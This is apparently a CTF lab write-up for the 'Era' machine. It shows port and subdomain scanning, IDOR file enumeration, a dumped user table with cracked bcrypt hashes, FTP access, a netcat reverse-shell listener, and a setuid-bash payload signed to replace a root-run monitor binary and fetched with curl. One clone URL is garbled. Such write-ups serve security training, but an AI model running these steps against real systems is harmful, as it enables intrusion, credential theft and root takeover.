Era

#linux #medium

sudo nmap -p- -sS --min-rate 5000 -Pn -n -vv -oA nmap/era 10.10.11.79

PORT   STATE SERVICE REASON
21/tcp open  ftp     syn-ack ttl 63
80/tcp open  http    syn-ack ttl 63

nmap -p 21,80 -sCV -oA nmap/scripts 10.10.11.79

PORT   STATE SERVICE VERSION
21/tcp open  ftp     vsftpd 3.0.5
80/tcp open  http    nginx 1.18.0 (Ubuntu)
|_http-server-header: nginx/1.18.0 (Ubuntu)
|_http-title: Did not follow redirect to http://era.htb/
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Add era.htb to /etc/hosts file

ffuf -u http://era.htb -H 'Host: FUZZ.era.htb' -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt -t 80 -ic -c -fs 154

file                    [Status: 200, Size: 6765, Words: 2608, Lines: 234, Duration: 175ms]

Add file.era.htb to /etc/hosts file

ffuf -u http://file.era.htb/FUZZ -w /usr/share/seclists/Discovery/Web-Content/DirBuster-2007_directory-list-2.3-medium.txt -t 80 -ic -c -fs 6765 -r -e .php

login.php               [Status: 200, Size: 9214, Words: 3701, Lines: 327, Duration: 175ms]
download.php            [Status: 200, Size: 9214, Words: 3701, Lines: 327, Duration: 171ms]
images                  [Status: 403, Size: 162, Words: 4, Lines: 8, Duration: 175ms]
register.php            [Status: 200, Size: 3205, Words: 1094, Lines: 106, Duration: 178ms]
files                   [Status: 403, Size: 162, Words: 4, Lines: 8, Duration: 175ms]
assets                  [Status: 403, Size: 162, Words: 4, Lines: 8, Duration: 178ms]
upload.php              [Status: 200, Size: 9214, Words: 3701, Lines: 327, Duration: 174ms]
layout.php              [Status: 200, Size: 0, Words: 1, Lines: 1, Duration: 182ms]
logout.php              [Status: 200, Size: 70, Words: 6, Lines: 1, Duration: 177ms]
manage.php              [Status: 200, Size: 9214, Words: 3701, Lines: 327, Duration: 171ms]
LICENSE                 [Status: 200, Size: 34524, Words: 5707, Lines: 663, Duration: 175ms]
reset.php               [Status: 200, Size: 9214, Words: 3701, Lines: 327, Duration: 167ms]

Create an account

Upload a file

http://file.era.htb/download.php?id=7126

Open Burp Suite

Download the file uploaded

Put FUZZ in the parameter id

GET /download.php?id=FUZZ&dl=true HTTP/1.1
Host: file.era.htb
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:145.0) Gecko/20100101 Firefox/145.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: http://file.era.htb/download.php?id=7126
Cookie: PHPSESSID=v8mt2j0321i5hvtbikj2lirkpo
Upgrade-Insecure-Requests: 1
Priority: u=0, i

ffuf -request download.req -request-proto http -w <(seq 0 1000) -fw 3161

150                     [Status: 200, Size: 2746, Words: 12, Lines: 9, Duration: 184ms]
54                      [Status: 200, Size: 2006697, Words: 7361, Lines: 7445, Duration: 177ms]

Download the two files

7z x site-backup-30-08-24.zip

sqlite3 filedb.sqlite 
SQLite version 3.51.1 2025-11-28 17:28:25
Enter ".help" for usage hints.
sqlite> .schema
CREATE TABLE files (
		fileid int NOT NULL PRIMARY KEY,
		filepath varchar(255) NOT NULL,
		fileowner int NOT NULL,
		filedate timestamp NOT NULL
		);
CREATE TABLE users (
		user_id INTEGER PRIMARY KEY AUTOINCREMENT,
		user_name varchar(255) NOT NULL,
		user_password varchar(255) NOT NULL,
		auto_delete_files_after int NOT NULL
		, security_answer1 varchar(255), security_answer2 varchar(255), security_answer3 varchar(255));
CREATE TABLE sqlite_sequence(name,seq);
sqlite> select user_name, user_password from users;
admin_ef01cab31aa|$2y$10$wDbohsUaezf74d3sMNRPi.o93wDxJqphM2m0VVUp41If6WrYr.QPC
eric|$2y$10$S9EOSDqF1RzNUvyVj7OtJ.mskgP1spN3g2dneU.D.ABQLhSV2Qvxm
veronica|$2y$10$xQmS7JL8UT4B3jAYK7jsNeZ4I.YqaFFnZNA/2GCxLveQ805kuQGOK
yuri|$2b$12$HkRKUdjjOdf2WuTXovkHIOXwVDfSrgCqqHPpE37uWejRqUWqwEL2.
john|$2a$10$iccCEz6.5.W2p7CSBOr3ReaOqyNmINMH1LaqeQaL22a1T1V/IddE6
ethan|$2a$10$PkV/LAd07ftxVzBHhrpgcOwD3G1omX4Dk2Y56Tv9DpuUV/dh/a1wC

Separate users from hashes with a :. Use this command to do it in nvim :%s/|/:/g

hashcat --username era /usr/share/seclists/Passwords/Leaked-Databases/rockyou.txt -m 3200

$2y$10$S9EOSDqF1RzNUvyVj7OtJ.mskgP1spN3g2dneU.D.ABQLhSV2Qvxm:america
$2b$12$HkRKUdjjOdf2WuTXovkHIOXwVDfSrgCqqHPpE37uWejRqUWqwEL2.:mustang

ftp 10.10.11.79
Connected to 10.10.11.79.
220 (vsFTPd 3.0.5)
Name (10.10.11.79:arch): yuri
331 Please specify the password.
Password: 
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> dir
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
drwxr-xr-x    2 0        0            4096 Jul 22 08:42 apache2_conf
drwxr-xr-x    3 0        0            4096 Jul 22 08:42 php8.1_conf
226 Directory send OK.
ftp> prompt off
Interactive mode off.
ftp> mget *
local: 000-default.conf remote: 000-default.conf
200 PORT command successful. Consider using PASV.
150 Opening BINARY mode data connection for 000-default.conf (1332 bytes).
226 Transfer complete.
1332 bytes received in 0.0032 seconds (409.6606 kbytes/s)
local: apache2.conf remote: apache2.conf
200 PORT command successful. Consider using PASV.
150 Opening BINARY mode data connection for apache2.conf (7224 bytes).
226 Transfer complete.
7224 bytes received in 0.0022 seconds (3.1978 Mbytes/s)
local: file.conf remote: file.conf
200 PORT command successful. Consider using PASV.
150 Opening BINARY mode data connection for file.conf (222 bytes).
226 Transfer complete.
222 bytes received in 0.0050 seconds (43.1845 kbytes/s)
local: ports.conf remote: ports.conf
200 PORT command successful. Consider using PASV.
150 Opening BINARY mode data connection for ports.conf (320 bytes).
226 Transfer complete.
320 bytes received in 0.0010 seconds (309.1449 kbytes/s)

Update security questions from user admin

sudo tcpdump -i tun0 -v icmp
tcpdump: listening on tun0, link-type RAW (Raw IP), snapshot length 262144 bytes
18:00:16.452939 IP (tos 0x0, ttl 63, id 58163, offset 0, flags [DF], proto ICMP (1), length 84)
    era.htb > archlinux: ICMP echo request, id 1, seq 1, length 64
18:00:16.452967 IP (tos 0x0, ttl 64, id 8913, offset 0, flags [none], proto ICMP (1), length 84)
    archlinux > era.htb: ICMP echo reply, id 1, seq 1, length 64

nc -lnvp 1111
Listening on 0.0.0.0 1111

Shell interactiva estable

eric@era:~$ ls
user.txt
eric@era:~$ cat user.txt

User flag

c7fd************************6004

eric@era:~$ groups
eric devs
eric@era:~$ find / -group devs 2>/dev/null
/opt/AV
/opt/AV/periodic-checks
/opt/AV/periodic-checks/monitor
/opt/AV/periodic-checks/status.log

Create a shell.c file

#include <unistd.h>
#include <stdio.h>
#include <stdlib.h>

int main(void){
  setuid(0);
  setgid(0);
  seteuid(0);
  setegid(0);
  system("cp /bin/bash /tmp/shell && chmod 4755 /tmp/shell");
}

gcc shell.c -o exploit

https://github.com/NUAA-WatchDog/linux-elf-binary-signer

git clone https://github.com/NUAA-Whttps://github.com/NUAA-WatchDog/linux-elf-binary-signer.git

docker run -it --rm -v $(pwd):/mnt ubuntu:20.04 bash
Unable to find image 'ubuntu:20.04' locally
20.04: Pulling from library/ubuntu
13b7e930469f: Pull complete 
Digest: sha256:8feb4d8ca5354def3d8fce243717141ce31e2c428701f6682bd2fafe15388214
Status: Downloaded newer image for ubuntu:20.04
root@15d606cdee24:/# apt install libssl-dev openssl gcc make -y
root@15d606cdee24:/# cd /mnt
root@15d606cdee24:/mnt# make
cc -o elf-sign elf_sign.c -lcrypto
./elf-sign.signed sha256 certs/kernel_key.pem certs/kernel_key.pem elf-sign
 --- 64-bit ELF file, version 1 (CURRENT), little endian.
 --- 31 sections detected.
 --- [Library dependency]: libcrypto.so.1.1
 --- [Library dependency]: libc.so.6
 --- Section 0016 [.text] detected.
 --- Length of section [.text]: 10195
 --- Signature size of [.text]: 465
 --- Writing signature to file: .text_sig
 --- Removing temporary signature file: .text_sig
 root@15d606cdee24:/mnt# ./elf-sign sha256 key.pem key.pem exploit monitor
 --- 64-bit ELF file, version 1 (CURRENT), little endian.
 --- 30 sections detected.
 --- [Library dependency]: libc.so.6
 --- Section 0013 [.text] detected.
 --- Length of section [.text]: 315
 --- Signature size of [.text]: 458
 --- Writing signature to file: .text_sig
 --- Removing temporary signature file: .text_sig

python3 -m http.server

eric@era:/opt/AV/periodic-checks$ ls
monitor  status.log
eric@era:/opt/AV/periodic-checks$ curl http://10.10.15.236:8000/monitor -o e
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
100 16162  100 16162    0     0  29562      0 --:--:-- --:--:-- --:--:-- 29600
eric@era:/opt/AV/periodic-checks$ ls
e  monitor  status.log
eric@era:/opt/AV/periodic-checks$ cp e monitor
eric@era:/opt/AV/periodic-checks$ ls -l /tmp
total 1388
-rwsr-xr-x 1 root root 1396520 Dec  2 16:37 shell
eric@era:/opt/AV/periodic-checks$ /tmp/shell -p
shell-5.1# id
uid=1000(eric) gid=1000(eric) euid=0(root) groups=1000(eric),1001(devs)
shell-5.1# cd /root
shell-5.1# ls
answers.sh  clean_monitor.sh  initiate_monitoring.sh  monitor  root.txt
shell-5.1# cat root.txt

Root flag

c921************************d186

PreviousEighteen NextEureka

Last updated 2 months ago

hashtagUser flag

hashtagRoot flag

User flag

Root flag